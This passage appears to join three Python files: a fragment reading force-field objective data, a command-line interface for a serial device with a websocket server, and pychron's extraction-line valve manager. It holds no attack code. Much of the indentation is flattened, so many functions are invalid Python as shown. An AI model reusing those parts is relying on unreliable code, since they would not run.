raise RuntimeError(f"tmp folder {folder} does not exist")
obj_file = os.path.join(folder, 'objective.p')
if os.path.exists(obj_file):
obj_data = lp_load(obj_file)
else:
obj_data = None
return obj_data
def get_workqueue_status(self):
""" Get the number of running/total works of work queue """
return self._workqueue_status.copy()
def update_workqueue_status(self, line):
worker_info = line[:line.index('workers busy')].rsplit(maxsplit=1)[-1]
jobs_info = line[:line.index('jobs complete')].rsplit(maxsplit=1)[-1]
busy_worker, total_worker = map(int, worker_info.split('/'))
job_finished, job_total = map(int, jobs_info.split('/'))
self._workqueue_status = {
'worker_running': busy_worker,
'worker_total': total_worker,
'job_finished': job_finished,
'job_total': job_total
}
print(f"work queue status updated {self._workqueue_status}")
self.notify_observer('work_queue_update')
    def get_target_objective_data(self, target_name, opt_iter):
        """ Read objective data for a target and an optimization iteration from the tmp folder

        Returns a dict with per-frame energies and a PDB string for abinitio
        targets, or a dict containing only an 'error' message on failure.
        """
        res = {}
        target_options = self.input_options['tgt_opts'].get(target_name, None)
        if target_options is None:
            res['error'] = f"target {target_name} not found"
            print(f"get_target_objective_data: {res['error']}")
            return res
        # check the tmp folder for this target
        folder = os.path.join(self.tmp_folder, target_name, f'iter_{opt_iter:04d}')
        if not os.path.isdir(folder):
            res['error'] = f"tmp folder {folder} not found"
            print(f"get_target_objective_data: {res['error']}")
            return res
        # get target type specific objective information
        target_type = target_options['type']
        if target_type.lower().startswith('abinitio'):
            # read energy compare data
            energy_compare_file = os.path.join(folder, 'EnergyCompare.txt')
            if not os.path.isfile(energy_compare_file):
                res['error'] = f"file {energy_compare_file} not found"
                print(f"get_target_objective_data: {res['error']}")
                return res
            energy_compare_data = np.loadtxt(energy_compare_file)
            # columns used: 0=QM energy, 1=MM energy, 2=difference, 3=weight
            res['qm_energies'] = energy_compare_data[:, 0].tolist()
            res['mm_energies'] = energy_compare_data[:, 1].tolist()
            res['diff'] = energy_compare_data[:, 2].tolist()
            res['weights'] = energy_compare_data[:, 3].tolist()
            # read molecule geometry
            mol_file = os.path.join(folder, 'coords.xyz')
            m = Molecule(mol_file)
            # generate pdb string
            if 'resname' not in m.Data:
                # xyz files carry no residue info; fill defaults for PDB output
                m.Data['resname'] = ['MOL'] * m.na
                m.Data['resid'] = [1] * m.na
            res['pdbString'] = '\n'.join(m.write_pdb(range(m.na)))
        else:
            res['error'] = f"get objective data for target type {target_type} not implemented"
            print(f"get_target_objective_data: {res['error']}")
            return res
        return res
|
cli.py | """
Command line entry
"""
#import asyncio
import threading
from os import getpid
import psutil
from .web import Webserver
from ..models import WebserverArgs
from ..framework.communicator import CommunicatorFactory
class CommandLine:
    '''Command line entry class
    '''

    def __init__(self, **kwargs):
        """Build the CLI wrapper and its embedded webserver.

        kwargs are forwarded both to WebserverArgs (via _build_options) and
        to the Webserver itself.
        """
        self.communication = 'uart'     # transport used for device discovery
        self.device_provider = None     # (unused; see device_discover_handler)
        self.communicator = None        # lazily created in detect_device
        self.supported_commands = []    # command table from the provider
        self.input_string = None        # last prompt input, split on spaces
        self.current_command = None     # command dict being executed
        self._build_options(**kwargs)
        self.webserver = Webserver(**kwargs)
        self.webserver_running = False
    def listen(self):
        # find device
        '''
        Start to find device
        '''
        self.detect_device(self.device_discover_handler)

    def detect_device(self, callback):
        '''find if there is a connected device'''
        # create the communicator on first use, then hand off discovery
        if self.communicator is None:
            self.communicator = CommunicatorFactory.create(
                self.communication, self.options)
        self.communicator.find_device(callback)

    def device_discover_handler(self, device_provider):
        '''
        Handler after device discovered
        '''
        # check if device is in bootloader
        # TODO: if in bootloader, only allow upgrade
        # TODO: if a normal device, allow other commands
        # load device provider
        self.webserver.set_communicator(self.communicator)
        self.webserver.load_device_provider(device_provider)
        # setup command
        #self.device_provider = device_provider
        self.setup_command_handler()
def setup_command_handler(self):
'''
Prepare command
'''
self.supported_commands = self.webserver.device_provider.get_command_lines()
while True:
token = input(">>")
self.input_string = token.split(" ")
if token.strip() == 'exit':
break
if self.webserver_running and token.strip() != 'stop':
print("server is on-going, please stop it")
continue
for command in self.supported_commands:
if command['name'] == self.input_string[0]:
self.current_command = command
eval('self.%s()' % (command['function']))
break
else:
self.help_handler()
self.exit_handler()
return True
    def start_webserver(self, current_loop):
        '''
        Start websocket server

        current_loop: event loop handed to the webserver (currently always
        None -- see server_start_handler).
        '''
        # asyncio.set_event_loop(asyncio.new_event_loop())
        self.webserver.start_webserver(current_loop)
        # if not current_loop.is_running():
        #     current_loop.run_forever()

    def _build_options(self, **kwargs):
        # wrap raw keyword options in the WebserverArgs model
        self.options = WebserverArgs(**kwargs)
# command handler
def help_handler(self):
'''
Help handler
'''
if len(self.supported_commands) > 0:
print("Usage: ")
for command in self.supported_commands:
print(command['name'] + " : " + command['description'])
else:
print("No more command line.")
    def connect_handler(self):
        '''
        Connect to device, may no need it later
        '''
        # just prints the discovered device's info string
        print(self.webserver.device_provider.get_device_info())
def upgrade_handler(self):
'''upgrade command is used for firmware upgrade and followed by file name
'''
input_args = len(self.input_string)
if input_args == 1:
print("Usage:")
print("upgrade file_name")
else:
file_name = self.input_string[1]
# TODO: check device is idel
self.webserver.device_provider.upgrade_framework(file_name)
return True
    def record_handler(self):
        '''record command is used to save the outputs into local machine
        '''
        # TODO: check device is idel
        if not self.webserver.device_provider.is_logging:
            self.webserver.device_provider.start_data_log()
        return True

    def stop_handler(self):
        '''stop command halts data logging and shuts down the websocket
        server if it is running
        '''
        # TODO: check device is idel
        if self.webserver.device_provider.is_logging:
            self.webserver.device_provider.stop_data_log()
        if self.webserver_running:
            self.webserver.stop_ws_server()
            self.webserver_running = False
        return True
    def get_handler(self):
        '''
        Get parameter of device
        '''
        input_args = len(self.input_string)
        conf = self.webserver.device_provider.get_conf()
        input_params_properties = conf['data']['inputParams']
        select_param = None
        if (input_args == 1):
            # no option given: list the selectable parameter arguments
            print("Usage: get [options]")
            print("Option: ")
            # NOTE(review): listing starts at index 2 -- apparently the first
            # two entries are not user-selectable; confirm with the provider.
            i = 2
            while i < len(input_params_properties):
                print(input_params_properties[i]['argument'])
                i += 1
            return True
        else:
            # search for the parameter whose 'argument' matches the input
            i = 2
            while i < len(input_params_properties):
                select_param = input_params_properties[i]
                if (select_param['argument'] == self.input_string[1]):
                    break
                i += 1
            if (i == len(input_params_properties)):
                # not found: show usage again
                print("Usage: get [options]")
                print("Option: ")
                i = 2
                while i < len(input_params_properties):
                    print(input_params_properties[i]['argument'])
                    i += 1
                return True
            # fetch and display the matched parameter's current value
            param = self.webserver.device_provider.get_param(
                {'paramId': select_param['paramId']})
            print(param['data']['value'])
            return True
    def set_handler(self):
        '''
        Set parameter of device
        '''
        input_args = len(self.input_string)
        conf = self.webserver.device_provider.get_conf()
        input_params_properties = conf['data']['inputParams']
        select_param = None
        not_in_options = False
        options = []
        if input_args == 1:
            # no arguments: list the settable parameters
            print("Usage: set <options> <values>")
            i = 2
            while i < len(input_params_properties):
                print(input_params_properties[i]['argument'])
                i += 1
            return True
        else:
            # find the parameter matching the given argument name
            i = 2
            while i < len(input_params_properties):
                select_param = input_params_properties[i]
                if (select_param['argument'] == self.input_string[1]):
                    break
                i += 1
            # NOTE(review): if the argument is not found AND a value was also
            # supplied (input_args > 2), select_param is left pointing at the
            # last entry and the set proceeds against it -- confirm intended.
            if input_args == 2:
                if i == len(input_params_properties):
                    # argument not recognized: show usage
                    print("Usage: set <options> <values>")
                    i = 2
                    while i < len(input_params_properties):
                        print(input_params_properties[i]['argument'])
                        i += 1
                else:
                    # argument recognized but no value given: show choices
                    print("Usage: set " + select_param['argument'] + " <values>")
                    print("values: ")
                    print(select_param['options'])
                return True
        # collect the allowed values for validation (dict options carry the
        # numeric value under 'key')
        if select_param.__contains__('options'):
            for item in select_param['options']:
                if isinstance(item, dict):
                    options.append(int(item['key']))
                else:
                    options.append(item)
        if select_param['type'] == 'int64':
            # numeric parameters are validated (and later set) as integers
            self.input_string[2] = int(self.input_string[2])
        if select_param['type'] == "char8" and self.input_string[2] not in select_param['options']:
            not_in_options = True
        if select_param['type'] == "int64" and\
           self.input_string[2] not in options:
            not_in_options = True
        if not_in_options:
            # value not allowed: show the valid choices
            print("Usage: set " + select_param['argument'] + " <values>")
            print("values: ")
            print(select_param['options'])
            return True
        self.webserver.device_provider.set_param({
            'paramId': select_param['paramId'],
            'value': self.input_string[2]
        })
        # TODO: display a response message to user
        return True
    def save_handler(self):
        '''
        Save device configuration
        '''
        # persist the current parameter values on the device
        self.webserver.device_provider.save_config()
        return True
    def server_start_handler(self):
        '''
        start a websocket server

        Launches the webserver in a background thread and marks it running.
        '''
        # self.webserver.start_websocket_server()
        # event-loop creation is disabled here; None is passed through and
        # the webserver presumably sets up its own loop -- TODO confirm
        loop = None  #asyncio.get_event_loop()
        webserver_thread = threading.Thread(
            target=self.start_webserver, args=(loop,))
        webserver_thread.start()
        self.webserver_running = True
        return True
    def exit_handler(self):
        '''
        Exit current process
        '''
        # self.webserver.stop()
        #self.webserver_running = False
        # NOTE(review): hard-kills the whole process via psutil rather than a
        # clean sys.exit(); presumably to take down non-daemon webserver
        # threads as well -- confirm before changing.
        pid = getpid()
        process = psutil.Process(pid)
        process.kill()
def run_handler(self):
'''used by customers
'''
return True
|
extraction_line_manager.py | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import logging
import time
from socket import gethostbyname, gethostname
from threading import Thread
# =============enthought library imports=======================
from apptools.preferences.preference_binding import bind_preference
from pyface.timer.do_later import do_after
from traits.api import Instance, List, Any, Bool, on_trait_change, Str, Int, Dict, File, Float, Enum
from pychron.canvas.canvas_editor import CanvasEditor
from pychron.core.file_listener import FileListener
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.core.wait.wait_group import WaitGroup
from pychron.envisage.consoleable import Consoleable
from pychron.extraction_line import LOG_LEVEL_NAMES, LOG_LEVELS
from pychron.extraction_line.explanation.extraction_line_explanation import ExtractionLineExplanation
from pychron.extraction_line.extraction_line_canvas import ExtractionLineCanvas
from pychron.extraction_line.graph.extraction_line_graph import ExtractionLineGraph
from pychron.extraction_line.sample_changer import SampleChanger
from pychron.globals import globalv
from pychron.hardware.core.i_core_device import ICoreDevice
from pychron.managers.manager import Manager
from pychron.monitors.system_monitor import SystemMonitor
from pychron.pychron_constants import NULL_STR
class ExtractionLineManager(Manager, Consoleable):
    """
    Manager for interacting with the extraction line
    contains reference to valve manager, gauge manager and laser manager
    """
    # canvases: the main canvas plus any plugin-supplied ones
    canvas = Instance(ExtractionLineCanvas)
    canvases = List
    plugin_canvases = List

    # UI panes / system monitoring
    explanation = Instance(ExtractionLineExplanation, ())
    monitor = Instance(SystemMonitor)

    # sub-managers (supplied by the application at startup)
    switch_manager = Any
    gauge_manager = Any
    cryo_manager = Any
    multiplexer_manager = Any
    manometer_manager = Any

    # connectivity graph of the extraction line
    network = Instance(ExtractionLineGraph)
    readback_items = List

    runscript = None
    learner = None

    mode = 'normal'

    # polling frequencies / ownership checks (bound to preferences)
    valve_state_frequency = Int
    valve_lock_frequency = Int
    check_master_owner = Bool
    use_network = Bool

    display_volume = Bool
    volume_key = Str

    sample_changer = Instance(SampleChanger)
    # name -> callable used to actuate linked valves
    link_valve_actuation_dict = Dict

    # canvas file locations (bound to preferences)
    canvas_path = File
    canvas_config_path = File

    use_hardware_update = Bool
    hardware_update_period = Float

    file_listener = None
    wait_group = Instance(WaitGroup, ())
    console_bgcolor = 'black'

    # internal state flags
    _active = False
    _update_status_flag = None
    _monitoring_valve_status = False

    canvas_editor = Instance(CanvasEditor, ())
    logging_level = Enum(LOG_LEVEL_NAMES)
    def set_extract_state(self, *args, **kw):
        """No-op here; accepts any arguments for interface compatibility."""
        pass
    def activate(self):
        """Mark the manager active, load canvases and cache hardware devices."""
        self._active = True
        self._load_additional_canvases()
        self._activate_hook()
        self.reload_canvas()
        # cache all registered hardware devices for later use
        devs = self.application.get_services(ICoreDevice)
        self.devices = devs
    def deactivate(self):
        """Stop gauge scanning and system monitoring; run deactivation hook."""
        if self.gauge_manager:
            self.gauge_manager.stop_scans()
        if self.monitor:
            self.monitor.stop()
        self._active = False
        self._deactivate_hook()
def bind_preferences(self):
prefid = 'pychron.extraction_line'
attrs = ('canvas_path', 'canvas_config_path',
'use_hardware_update', 'hardware_update_period',
'check_master_owner', 'use_network', 'logging_level')
for attr in attrs:
try:
bind_preference(self, attr, '{}.{}'.format(prefid, attr))
except BaseException as e:
print('fffffffff', attr, e)
bind_preference(self.network, 'inherit_state', '{}.inherit_state'.format(prefid))
self.console_bind_preferences('{}.console'.format(prefid))
if self.gauge_manager:
bind_preference(self.gauge_manager, 'update_period', '{}.gauge_update_period'.format(prefid))
bind_preference(self.gauge_manager, 'use_update', '{}.use_gauge_update'.format(prefid))
if self.canvas:
bind_preference(self.canvas.canvas2D, 'display_volume', '{}.display_volume'.format(prefid))
bind_preference(self.canvas.canvas2D, 'volume_key', '{}.volume_key'.format(prefid))
def link_valve_actuation(self, name, func, remove=False):
if remove:
try:
del self.link_valve_actuation_dict[name]
except KeyError:
self.debug('could not remove "{}". not in dict {}'.format(name,
','.join(
list(
self.link_valve_actuation_dict.keys()))))
else:
self.debug('adding name="{}", func="{}" to link_valve_actuation_dict'.format(name, func.__name__))
self.link_valve_actuation_dict[name] = func
def enable_auto_reload(self):
self.file_listener = fm = FileListener(path=self.canvas_path,
callback=self.reload_canvas)
def disable_auto_reload(self):
if self.file_listener:
self.file_listener.stop()
    def do_sample_loading(self):
        """
        Walk the operator through a sample change:
        1. isolate chamber
        2. evacuate chamber
        3. finish sample change
        A confirmation dialog precedes each stage; any 'no' or stage failure
        aborts the remaining steps.
        :return:
        """
        sc = self._sample_changer_factory()
        if sc:
            if self.confirmation_dialog('Ready to Isolate Chamber'):
                self._handle_console_message(('===== Isolate Chamber =====', 'maroon'))
                if not sc.isolate_chamber():
                    return
            else:
                return

            if self.confirmation_dialog('Ready to Evacuate Chamber'):
                self._handle_console_message(('===== Evacuate Chamber =====', 'maroon'))
                # a non-empty err means evacuation needs extra confirmation
                err = sc.check_evacuation()
                if err:
                    name = sc.chamber
                    msg = 'Are you sure you want to evacuate the {} chamber. {}'.format(name, err)
                    if not self.confirmation_dialog(msg):
                        return
                if not sc.evacuate_chamber():
                    return
            else:
                return

            if self.confirmation_dialog('Ready to Finish Sample Change'):
                self._handle_console_message(('===== Finish Sample Change =====', 'maroon'))
                sc.finish_chamber_change()
def get_volume(self, node_name):
v = 0
if self.use_network:
v = self.network.calculate_volumes(node_name)[0][1]
return v
def test_cryo_communication(self):
self.info('test cryo communication')
ret, err = True, ''
if self.cryo_manager:
if self.cryo_manager.simulation:
ret = globalv.communication_simulation
else:
ret = self.cryo_manager.test_connection()
return ret, err
def test_gauge_communication(self):
self.info('test gauge communication')
ret, err = True, ''
if self.gauge_manager:
if self.gauge_manager.simulation:
ret = globalv.communication_simulation
else:
ret = self.gauge_manager.test_connection()
return ret, err
def test_connection(self):
self.info('test connection')
return self.test_valve_communication()
def test_valve_communication(self):
self.info('test valve communication')
print('asdf', self.switch_manager, hasattr(self.switch_manager, 'get_state_checksum'))
ret, err = True, ''
if self.switch_manager:
if hasattr(self.switch_manager, 'get_state_checksum'):
valves = self.switch_manager.switches
vkeys = sorted(valves.keys())
state = self.switch_manager.get_state_checksum(vkeys)
ret = bool(state)
return ret, err
def setup_status_monitor(self):
self.stop_status_monitor(id(self), block=True)
self.start_status_monitor(id(self))
self.refresh_states()
def stop_status_monitor(self, *args, **kw):
pass
def start_status_monitor(self, *args, **kw):
pass
def refresh_states(self, *args, **kw):
pass
def refresh_canvas(self):
    """Redraw every canvas registered with this manager."""
    for canvas in self.canvases:
        canvas.refresh()
def finish_loading(self):
if self.use_network:
self.network.load(self.canvas_path)
self._set_logger_level(self.switch_manager)
def reload_canvas(self):
    """Reload the canvas scene from disk, re-sync the network model and
    pipette counts, run the subclass hook, then force a redraw."""
    self.debug('reload canvas')
    self.reload_scene_graph()
    if self.use_network:
        self.network.load(self.canvas_path)
    sm = self.switch_manager
    if sm:
        sm.refresh_network()
        # reload all trackers first, then push the counts onto the canvas
        for p in sm.pipette_trackers:
            p.load()
        for p in sm.pipette_trackers:
            self._set_pipette_counts(p.name, p.counts)
    self._reload_canvas_hook()
    self.refresh_canvas()
def reload_scene_graph(self):
    """Rebuild each canvas scene from disk and restore the current valve
    lock and open/closed flags onto the freshly created canvas items."""
    self.info('reloading canvas scene')
    for c in self.canvases:
        self.canvas_editor.load(c.canvas2D, self.canvas_path)
        # c.load_canvas_file(c.config_name)
        if self.switch_manager:
            c.load_canvas_file(self.canvas_path, self.canvas_config_path, self.switch_manager.valves_path)
            for k, v in self.switch_manager.switches.items():
                vc = c.get_object(k)
                if vc:
                    # mirror the switch's software lock and state onto
                    # the canvas representation
                    vc.soft_lock = v.software_lock
                    vc.state = v.state
def update_switch_state(self, name, state, *args, **kw):
    """Propagate a switch state change to the network model (when enabled)
    and then to every canvas."""
    if self.use_network:
        self.network.set_valve_state(name, state)
        for canvas in self.canvases:
            self.network.set_canvas_states(canvas, name)
    for canvas in self.canvases:
        canvas.update_switch_state(name, state, *args, **kw)
def update_switch_lock_state(self, *args, **kw):
for c in self.canvases:
c.update_switch_lock_state(*args, **kw)
def update_switch_owned_state(self, *args, **kw):
for c in self.canvases:
c.update_switch_owned_state(*args, **kw)
def set_valve_owner(self, name, owner):
"""
set flag indicating if the valve is owned by a system
"""
if self.switch_manager is not None:
self.switch_manager.set_valve_owner(name, owner)
def show_valve_properties(self, name):
if self.switch_manager is not None:
self.switch_manager.show_valve_properties(name)
def get_software_lock(self, name, **kw):
if self.switch_manager is not None:
return self.switch_manager.get_software_lock(name, **kw)
def set_software_lock(self, name, lock):
if self.switch_manager is not None:
if lock:
self.switch_manager.lock(name)
else:
self.switch_manager.unlock(name)
description = self.switch_manager.get_switch_by_name(name).description
self.info('{} ({}) {}'.format(name, description, 'lock' if lock else 'unlock'),
color='blue' if lock else 'black')
self.update_switch_lock_state(name, lock)
def get_state_checksum(self, vkeys):
if self.switch_manager is not None:
return self.switch_manager.calculate_checksum(vkeys)
def get_valve_owners(self):
if self.switch_manager is not None:
return self.switch_manager.get_owners()
def get_locked(self):
if self.switch_manager is not None:
return self.switch_manager.get_locked()
def get_valve_lock_states(self):
if self.switch_manager is not None:
return self.switch_manager.get_software_locks()
def get_valve_state(self, name=None, description=None):
if self.switch_manager is not None:
if description is not None and description.strip():
return self.switch_manager.get_state_by_description(description)
else:
return self.switch_manager.get_state_by_name(name)
def get_indicator_state(self, name=None, description=None):
if self.switch_manager is not None:
if description is not None and description.strip():
return self.switch_manager.get_indicator_state_by_description(description)
else:
return self.switch_manager.get_indicator_state_by_name(name)
def get_valve_states(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_states(query=not self.use_hardware_update)
def get_state_word(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_states(query=not self.use_hardware_update, version=1)
def get_lock_word(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_software_locks(version=1)
def get_valve_by_name(self, name):
if self.switch_manager is not None:
return self.switch_manager.get_switch_by_name(name)
def get_valve_names(self):
    """Return the valve names known to the switch manager, or an empty
    list when no switch manager is configured."""
    if self.switch_manager is None:
        return []
    return self.switch_manager.get_valve_names()
def get_pressure(self, controller, name):
if self.gauge_manager:
return self.gauge_manager.get_pressure(controller, name)
def get_device_value(self, dev_name):
dev = self.get_device(dev_name)
if dev is None:
self.unique_warning('No device named {}'.format(dev_name))
else:
return dev.get()
def disable_valve(self, description):
self._enable_valve(description, False)
def enable_valve(self, description):
self._enable_valve(description, True)
def lock_valve(self, name, **kw):
return self._lock_valve(name, True, **kw)
def unlock_valve(self, name, **kw):
return self._lock_valve(name, False, **kw)
def open_valve(self, name, **kw):
return self._open_close_valve(name, 'open', **kw)
def close_valve(self, name, **kw):
return self._open_close_valve(name, 'close', **kw)
def sample(self, name, **kw):
    """Open valve *name* for its configured ``sample_period`` seconds and
    close it again, on a background thread so the caller is not blocked."""
    def sample():
        valve = self.switch_manager.get_switch_by_name(name)
        if valve is not None:
            self.info('start sample')
            self.open_valve(name, **kw)
            # sample_period comes from the valve's own configuration
            time.sleep(valve.sample_period)
            self.info('end sample')
            self.close_valve(name, **kw)
    t = Thread(target=sample)
    t.start()
def cycle(self, name, **kw):
    """Open/close valve *name* ``cycle_n`` times, pausing ``cycle_period``
    seconds after each actuation, on a background thread."""
    def cycle():
        valve = self.switch_manager.get_switch_by_name(name)
        if valve is not None:
            # n and period come from the valve's own configuration
            n = valve.cycle_n
            period = valve.cycle_period
            self.info('start cycle n={} period={}'.format(n, period))
            for i in range(n):
                self.info('valve cycling iteration ={}'.format(i + 1))
                self.open_valve(name, **kw)
                time.sleep(period)
                self.close_valve(name, **kw)
                time.sleep(period)
    t = Thread(target=cycle)
    t.start()
def get_script_state(self, key):
return self.pyscript_editor.get_script_state(key)
def set_selected_explanation_item(self, obj):
if self.explanation:
selected = None
if obj:
selected = next((i for i in self.explanation.explanable_items if obj.name == i.name), None)
self.explanation.selected = selected
def new_canvas(self, config=None):
c = ExtractionLineCanvas(manager=self,
display_name='Extraction Line')
c.load_canvas_file(canvas_config_path=config)
self.canvases.append(c)
c.canvas2D.trait_set(display_volume=self.display_volume,
volume_key=self.volume_key)
if self.switch_manager:
self.switch_manager.load_valve_states()
self.switch_manager.load_valve_lock_states(force=True)
self.switch_manager.load_valve_owners()
c.refresh()
return c
def get_wait_control(self):
wd = self.wait_group.active_control
if wd.is_active():
wd = self.wait_group.add_control()
return wd
def set_experiment_type(self, v):
self.debug('setting experiment type={}'.format(v))
if self.cryo_manager:
self.cryo_manager.species = v
# =========== Cryo ==============================================================
def set_cryo(self, v, v2=None):
self.debug('setting cryo to {}, {}'.format(v, v2))
if self.cryo_manager:
return self.cryo_manager.set_setpoint(v, v2)
else:
self.warning('cryo manager not available')
return 0, 0
def get_cryo_temp(self, iput):
self.debug('get cryo temp {}'.format(iput))
if self.cryo_manager:
return self.cryo_manager.read_input(iput)
else:
self.warning('cryo manager not available')
return 0
# ===============================================================================
# ============= Manometer =======================================================
def get_manometer_pressure(self, idx=0):
self.debug('get manometer pressure')
ret = 0
if self.manometer_manager:
ret = self.manometer_manager.get_pressure(idx)
else:
self.warning('manometer manager not available')
return ret
# ===============================================================================
# ===============================================================================
# private
# ===============================================================================
def _load_additional_canvases(self):
for ci in self.plugin_canvases:
c = ExtractionLineCanvas(manager=self,
display_name=ci['display_name'], )
c.load_canvas_file(ci['canvas_path'], ci['config_path'], ci['valve_path'])
self.canvases.append(c)
def _activate_hook(self):
self.monitor = SystemMonitor(manager=self, name='system_monitor')
self.monitor.monitor()
if self.gauge_manager:
self.info('start gauge scans')
self.gauge_manager.start_scans()
if self.switch_manager and self.use_hardware_update:
do_after(1000, self._update)
def _update(self):
if self.use_hardware_update and self._active:
self.switch_manager.load_hardware_states()
self.switch_manager.load_valve_owners()
do_after(self.hardware_update_period * 1000, self._update)
def _deactivate_hook(self):
pass
def _reload_canvas_hook(self):
pass
def _log_spec_event(self, name, action):
sm = self.application.get_service('pychron.spectrometer.scan_manager.ScanManager')
if sm:
color = 0x98FF98 if action == 'open' else 0xFF9A9A
sm.add_spec_event_marker('{} ({})'.format(name, action),
mode='valve',
extra=name,
bgcolor=color)
def _enable_valve(self, description, state):
if self.switch_manager:
valve = self.switch_manager.get_valve_by_description(description)
if valve is None:
valve = self.switch_manager.get_switch_by_name(description)
if valve is not None:
if not state:
self.close_valve(valve.name)
valve.enabled = state
def _lock_valve(self, name, action, description=None, address=None, **kw):
"""
:param name:
:param action: bool True ==lock false ==unlock
:param description:
:param kw:
:return:
"""
vm = self.switch_manager
if vm is not None:
oname = name
if address:
name = vm.get_name_by_address(address)
if description and description != NULL_STR:
name = vm.get_name_by_description(description, name=name)
if not name:
self.warning('Invalid valve name={}, description={}'.format(oname, description))
return False
v = vm.get_switch_by_name(name)
if action:
v.lock()
else:
v.unlock()
self.update_switch_lock_state(name, action)
self.refresh_canvas()
return True
def _open_close_valve(self, name, action, description=None, address=None, mode='remote', **kw):
    """Resolve a valve by name, description or hardware address and apply
    *action* ('open' or 'close').

    On a successful, state-changing actuation this also logs the event,
    actuates child valves and fires any linked-actuation callback.

    Returns:
        (result, changed) from the state change, or (False, False) when
        the valve cannot be resolved.
    """
    vm = self.switch_manager
    if vm is not None:
        oname = name
        # address/description take precedence over the raw name
        if address:
            name = vm.get_name_by_address(address)
        if description and description != NULL_STR:
            name = vm.get_name_by_description(description, name)
        # check if specified valve is in the valves.xml file
        if not name:
            self.warning('Invalid valve name={}, description={}'.format(oname, description))
            return False, False
        result = self._change_switch_state(name, mode, action, **kw)
        self.debug('open_close_valve, mode={} result={}'.format(mode, result))
        if mode == 'script':
            # canvas refresh must run on the GUI thread when driven by scripts
            invoke_in_main_thread(self.refresh_canvas)
        if result:
            if all(result):
                # actuation succeeded AND the state actually changed
                valve = vm.get_switch_by_name(name)
                description = valve.description
                self._log_spec_event(name, action)
                self.info('{:<6s} {} ({})'.format(action.upper(), valve.name, description),
                          color='red' if action == 'close' else 'green')
                vm.actuate_children(name, action, mode)
                ld = self.link_valve_actuation_dict
                if ld:
                    try:
                        func = ld[name]
                        func(name, action)
                    except KeyError:
                        self.debug('name="{}" not in '
                                   'link_valve_actuation_dict. keys={}'.format(name, ','.join(list(ld.keys()))))
        return result
def _change_switch_state(self, name, mode, action, sender_address=None, **kw):
result, change = False, False
if self._check_ownership(name, sender_address):
func = getattr(self.switch_manager, '{}_by_name'.format(action))
ret = func(name, mode=mode, **kw)
self.debug('change switch state name={} action={} ret={}'.format(name, action, ret))
if ret:
result, change = ret
if isinstance(result, bool):
if change:
self.update_switch_state(name, True if action == 'open' else False)
return result, change
def _check_ownership(self, name, requestor, force=False):
"""
check if this valve is owned by
another client
if this is not a client but you want it to
respect valve ownership
set check_master_owner=True
"""
ret = True
if force or self.check_master_owner:
if requestor is None:
requestor = gethostbyname(gethostname())
self.debug('checking ownership. requestor={}'.format(requestor))
try:
v = self.switch_manager.switches[name]
ret = not (v.owner and v.owner != requestor)
except KeyError:
pass
return ret
def _set_pipette_counts(self, name, value):
for c in self.canvases:
scene = c.canvas2D.scene
obj = scene.get_item('vlabel_{}Pipette'.format(name))
if obj is not None:
obj.value = int(value)
c.refresh()
def _sample_changer_factory(self):
sc = self.sample_changer
if sc is None:
sc = SampleChanger(manager=self)
if sc.setup():
result = sc.edit_traits(view='chamber_select_view')
if result:
if sc.chamber and sc.chamber != NULL_STR:
self.sample_changer = sc
return sc
def _create_manager(self, klass, manager, params, **kw):
# try a lazy load of the required module
# if 'fusions' in manager:
# package = 'pychron.managers.laser_managers.{}'.format(manager)
# self.laser_manager_id = manager
if 'rpc' in manager:
package = 'pychron.rpc.manager'
else:
package = 'pychron.managers.{}'.format(manager)
if manager in ('switch_manager', 'gauge_manager', 'multiplexer_manager', 'cryo_manager', 'manometer_manager'):
if manager == 'switch_manager':
man = self._switch_manager_factory()
self.switch_manager = man
return man
else:
return getattr(self, manager)
else:
class_factory = self.get_manager_factory(package, klass, warn=False)
if class_factory is None:
package = 'pychron.extraction_line.{}'.format(manager)
class_factory = self.get_manager_factory(package, klass)
if class_factory:
m = class_factory(**params)
self.add_trait(manager, m)
return m
else:
self.debug('could not create manager {}, {},{},{}'.format(klass, manager, params, kw))
def _set_logger_level(self, obj=None):
level = LOG_LEVELS.get(self.logging_level, logging.DEBUG)
if obj:
getattr(obj, 'logger').setLevel(level)
if hasattr(obj, 'set_logger_level_hook'):
obj.set_logger_level_hook(level)
# ===============================================================================
# handlers
# ===============================================================================
def _logging_level_changed(self, new):
if new:
self._set_logger_level(self)
if self.switch_manager:
self._set_logger_level(self.switch_manager)
@on_trait_change('use_hardware_update')
def _update_use_hardware_update(self):
if self.use_hardware_update:
do_after(1000, self._update)
@on_trait_change('switch_manager:pipette_trackers:counts')
def _update_pipette_counts(self, obj, name, old, new):
self._set_pipette_counts(obj.name, new)
@on_trait_change('use_network,network:inherit_state')
def _update_network(self):
from pychron.canvas.canvas2D.scene.primitives.valves import Valve
if not self.use_network:
for c in self.canvases:
scene = c.canvas2D.scene
for item in scene.get_items():
if not isinstance(item, Valve):
item.active_color = item.default_color
else:
item.active_color = item.oactive_color
else:
net = self.network
if self.switch_manager:
for k, vi in self.switch_manager.switches.items():
net.set_valve_state(k, vi.state)
self.reload_canvas()
@on_trait_change('display_volume,volume_key')
def _update_canvas_inspector(self, name, new):
for c in self.canvases:
c.canvas2D.trait_set(**{name: new})
def _handle_state(self, new):
# self.debug('handle state {}'.format(new))
if isinstance(new, tuple):
self.update_switch_state(*new)
else:
# n = len(new)
for i, ni in enumerate(new):
self.update_switch_state(*ni)
# self.update_switch_state(refresh=i == n - 1, *ni)
def _handle_lock_state(self, new):
self.debug('refresh_lock_state fired. {}'.format(new))
self.update_switch_lock_state(*new)
def _handle_owned_state(self, new):
self.update_switch_owned_state(*new)
def _handle_refresh_canvas(self, new):
# self.debug('refresh_canvas_needed fired')
self.refresh_canvas()
def _handle_console_message(self, new):
color = None
if isinstance(new, tuple):
msg, color = new
else:
msg = new
if color is None:
color = self.console_default_color
if self.console_display:
